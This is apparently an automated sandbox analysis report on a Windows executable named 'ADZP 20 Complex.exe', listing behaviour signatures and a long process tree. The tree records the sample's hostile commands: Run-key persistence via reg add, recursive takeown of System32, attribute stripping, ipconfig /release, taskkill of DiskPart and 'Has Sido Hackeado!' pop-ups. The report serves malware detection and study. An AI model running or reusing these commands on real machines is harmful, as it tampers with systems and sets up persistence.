Analysis Overview
SHA256
6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
Threat Level: Likely malicious
The file ADZP 20 Complex.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies Windows Firewall
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Drops file in System32 directory
Drops autorun.inf file
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of SetWindowsHookEx
Modifies registry class
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Kills process with taskkill
Gathers network information
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported
2024-05-25 16:32
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 16:32
Reported
2024-05-25 16:35
Platform
win7-20240508-en
Max time kernel
16s
Max time network
120s
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\317C.tmp\317D.tmp\317E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3997.tmp\3998.tmp\3999.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\39E5.tmp\39E6.tmp\39E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3A14.tmp\3A15.tmp\3A16.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5762069781943681416-1423496694-104786870-53312932514848603702038929073-238344637"
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-170475197511795937554881505741372221019166034240-267057350-13784797421325353237"
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
